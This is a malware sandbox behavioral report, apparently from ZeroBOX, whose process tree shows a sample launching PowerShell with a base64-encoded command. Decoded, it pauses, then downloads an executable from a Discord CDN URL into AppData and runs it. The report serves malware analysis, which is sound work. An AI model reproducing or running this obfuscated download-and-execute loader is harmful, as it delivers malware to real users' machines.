| ZeroBOX

Behavioral Analysis

Process tree

  • 5.exe "C:\Users\test22\AppData\Local\Temp\5.exe"

    1552
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcABmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAOAA0ADkAMQAwADEAOQA3ADcAMQA5ADQANAA5ADcAMwAzAC8AMQAwADgANAA5ADEAMAA0ADQANAA5ADUAMgA3ADAAMwAwADIANgAvAHIAZQB5AGMAcgB5AHQAcAAuAGUAeABlACcALAAgADwAIwBhAGYAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAcQBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABmAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAcABwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADUALgBlAHgAZQAnACkAPAAjAHgAegBoACMAPgA="

      2192

Process contents

No process loaded Click on a process in the tree above to load its data.